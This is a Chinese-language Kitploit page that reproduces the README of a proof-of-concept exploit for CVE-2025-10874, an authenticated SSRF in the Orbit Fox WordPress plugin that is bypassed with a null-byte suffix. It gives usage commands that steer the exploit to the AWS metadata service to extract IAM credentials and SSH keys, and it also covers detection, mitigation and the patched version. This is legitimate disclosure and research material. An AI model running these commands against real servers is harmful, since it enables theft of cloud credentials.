Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Orbit-Fox_SSRF_CVE-2025-10874 — 演示如何利用空字节注入绕过 CVE-2025-10874 的 SSRF 漏洞 | Kitploit
工具/GitHubGitHub/ryanmroth/orbit-fox_ssrf_cve-2025-10874
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubryanmroth/orbit-fox_ssrf_cve-2025-10874

Orbit-Fox_SSRF_CVE-2025-10874

演示如何利用空字节注入绕过 CVE-2025-10874 的 SSRF 漏洞

查看仓库
10个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

alt text

CVE-2025-10874 - Orbit Fox SSRF 概念验证

概念验证漏洞利用,演示 Orbit Fox WordPress 插件中存在的服务器端请求伪造(SSRF)漏洞,并利用空字节注入绕过。

详细博客文章:https://ryanmroth.com/articles/orbit-fox-ssrf

漏洞详情

详情说明
CVE ID:CVE-2025-10874
受影响插件:ThemeIsle 的 Orbit Fox
漏洞类型:服务器端请求伪造(SSRF)(CWE-918)
CVSS 评分:5.5(中危)
所需权限:Author+(WordPress 作者角色或更高权限
修复版本3.0.2+

描述

Orbit Fox 插件的 MyStock 导入功能存在 SSRF 漏洞,允许具有 Author+ 权限的已认证用户从 WordPress 服务器发起任意 HTTP 请求。该漏洞存在于 handle-request-mystock-import AJAX 操作中,该操作未能正确验证和清理 URL 参数。

该漏洞利用空字节注入绕过(%00.txt)来规避 URL 验证,从而能够访问服务器可访问的内部元数据服务、云提供商 API 及其他网络资源。

常见攻击场景

AWS EC2 元数据提取

  • 实例主机名: http://169.254.169.254/latest/meta-data/hostname
  • IAM 凭据: http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • SSH 公钥: http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

安装

环境要求

  • Python 3.7+
  • requests 库
  • urllib3 库

设置

root@kitploit:~
# 克隆仓库
git clone <repository-url>
cd Orbit-Fox_SSRF_CVE-2025-10874

# 安装依赖(使用 uv)
uv sync

# 或使用 pip
pip install requests urllib3

使用方法

基本用法

root@kitploit:~
# 提取 AWS 实例主机名(默认目标)
python orbit_fox_poc.py http://target.com -u author -p password123

# 指定自定义 SSRF 目标 URL
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/hostname

高级示例

root@kitploit:~
# 提取 IAM 角色凭据
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

# 提取 SSH 公钥
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

# 不使用空字节绕过进行测试(在已修补版本上会失败)
python orbit_fox_poc.py http://target.com -u author -p password123 --no-nullbyte

# 启用调试输出以进行故障排查
python orbit_fox_poc.py http://target.com -u author -p password123 --debug

命令行选项

root@kitploit:~
位置参数:
  target                目标 WordPress URL(例如 http://example.com)

必需参数:
  -u, --username        WordPress 用户名(需要 Author+ 角色)
  -p, --password        WordPress 密码

可选参数:
  -h, --help            显示帮助信息并退出
  -s, --ssrf-url        通过 SSRF 请求的 URL
                        (默认:http://169.254.169.254/latest/meta-data/hostname)
  --no-nullbyte         禁用空字节绕过(仅测试基本 SSRF)
  --debug               启用调试输出以进行故障排查

工作原理

  1. 身份验证: 使用提供的凭据向 WordPress 进行身份验证
  2. Nonce 获取: 从 WordPress 管理面板提取安全 nonce
  3. 空字节注入: 在目标 URL 后追加 %00.txt 以绕过验证
  4. SSRF 执行: 向 handle-request-mystock-import AJAX 端点发送构造的请求
  5. 内容获取: 从 WordPress 媒体库获取并显示检索到的内容

检测

日志指标

  • 向元数据服务(169.254.169.254)发出的异常出站 HTTP 请求
  • 对 admin-ajax.php 且 action 为 handle-request-mystock-import 的请求
  • 来自内部/元数据 URL 的 WordPress 媒体库上传

缓解措施

  • 将 Orbit Fox 更新至 3.0.2 或更高版本
  • 在 WordPress 服务器上实施严格的出站流量过滤
  • 监控并限制对云元数据端点的访问
  • 审查用户角色并限制 Author+ 权限

负责任披露

该漏洞已负责任地向供应商披露,并已在 Orbit Fox 3.0.2 版本中修复。此概念验证仅用于:

  • 安全研究与测试
  • 对授权系统进行漏洞评估
  • 教育目的

法律免责声明

仅限授权安全测试

本工具仅用于教育和授权安全测试目的。未经授权访问计算机系统属于违法行为。用户必须:

  • 在测试前获得明确的书面许可
  • 仅对您拥有或获得授权测试的系统使用
  • 遵守所有适用的法律法规

作者对滥用本工具不承担任何责任。

参考

  • 原始漏洞 Alex Sanford – CVE-2023-2287
  • CVE 详情: CVE-2025-10874
  • 插件仓库: ThemeIsle 的 Orbit Fox
  • AWS 元数据服务: 实例元数据服务

最后更新: 2025-10-06

下载工具